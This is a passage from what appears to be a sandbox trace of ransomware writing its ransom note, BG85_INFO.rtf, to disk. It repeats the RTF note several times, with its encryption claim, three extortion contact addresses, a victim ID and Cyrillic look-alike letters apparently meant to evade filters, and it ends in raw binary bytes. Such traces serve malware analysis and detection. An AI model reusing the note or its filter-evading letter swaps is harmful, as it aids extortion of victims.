d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0078.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x25ad0d8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\np¿WD÷\x0fe^`Ì!II\x05\x8aUá³\x81Í|\x86e\x12 cG®n&lhkô\x09mË\x05\x9fös)$\x0bsã\x9d\x7fÉ\rý)sdÁ\x1bs0\x19­­Ê4ñAmÈ\x9b/Á\x86¶ó\x92\r\x7fËõ\x1aH\x985Z¾»}\"}Î4\x0e<,\\\x92 Ü3h¬bÖ|ÕÜ\x04õw\x16Æ\x87>²§Û3ÿPH\x03û¥g·nïß\x04¯Â#5c\x03ay\x0c$ç¨\x17ïWæ¼Ñù\x021+Ùv\x05ÌW.#\x8cJÈ\x99Ú°", lpUsedDefaultChar=0x0) returned 7247 [0078.744] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ad0d8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x25ad0d8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0078.745] CloseHandle (hObject=0x1f0) returned 1 [0078.746] GetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\BG85_INFO.rtf" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bg85_info.rtf")) returned 0xffffffff [0078.746] GetLastError () returned 0x2 [0078.746] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\BG85_INFO.rtf" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\stationery\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0078.901] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s 